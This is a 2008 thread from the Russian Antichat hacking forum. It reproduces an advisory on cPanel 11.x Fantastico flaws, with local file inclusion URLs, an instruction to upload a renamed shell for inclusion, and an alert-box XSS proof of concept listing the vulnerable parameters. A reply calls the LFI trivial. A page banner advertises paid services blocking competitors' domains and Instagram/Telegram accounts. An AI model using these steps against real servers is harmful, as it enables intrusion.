cpanel 11.x XSS / Local File Inclusion Vulnerability

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
cpanel 11.x XSS / Local File Inclusion Vulnerability

Опции темы

Поиск в этой теме

Опции просмотра

cpanel 11.x XSS / Local File Inclusion Vulnerability

01.11.2008, 00:59

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

С нами: 9655526

Репутация: 1334

cpanel 11.x XSS / Local File Inclusion Vulnerability

----------------------------------------------------------------

Script : Cpanel 11.x

Type : Local File Inclusion & Cross Site Scripting

Risk : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

**** I am 17 Years Old ****

My Official Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Local File Inclusion Vulnerability :

Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and
enter vulnerable address in url ....

https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhea d&scriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhea d&scriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhea d&scriptpath_show=/home/[youruser]/

----------------------------------------------------------------

Cross site scripting :

File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrad e%20to%201.7.4

Set Action as Upgrade%20to%201.7.4

Vulnerable Variables :

$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion

For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrad e%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xs s%27)%3C/script%3E

----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

𝕏 Twitter Reddit Telegram Копировать ссылку

03.11.2008, 00:22

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

С нами: 10762826

Репутация: 1348

Цитата:

Note : Rename your shell to config.php and upload with your ftp account in ./ directory

. Имея FTP доступ заливать php файл для локального инклуда - это, конечно, тру-хак. =/

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

Последний раз редактировалось 1ten0.0net1; 03.11.2008 в 00:29..

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
remote arbitrary file upload vulnerability	gesik	Уязвимости	1	03.08.2008 23:17
ПОДСКАЖИТЕ команды дла командной строки!!!!	P@rtiZaN	Windows	2	26.12.2007 00:11
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход